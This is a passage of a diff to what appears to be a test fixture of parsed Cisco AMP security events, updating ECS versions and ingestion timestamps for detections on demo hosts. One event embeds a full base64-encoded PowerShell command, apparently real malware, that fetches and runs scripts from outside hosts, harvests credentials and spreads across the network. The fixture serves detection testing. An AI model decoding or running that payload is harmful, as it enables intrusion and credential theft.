Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2176,7 +2176,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2200,7 +2200,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500182993Z", + "ingested": "2021-09-13T18:07:28.111189928Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2257,7 +2257,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2283,7 +2283,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500185061Z", + "ingested": "2021-09-13T18:07:28.111192015Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2340,7 +2340,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2366,7 +2366,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500187130Z", + "ingested": "2021-09-13T18:07:28.111194086Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2414,7 +2414,7 @@ { "@timestamp": "2021-01-14T16:14:44.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2432,7 +2432,7 @@ "event": { "severity": 2, "action": "Threat Detection", - "ingested": "2021-09-12T17:31:54.500189198Z", + "ingested": "2021-09-13T18:07:28.111196171Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgA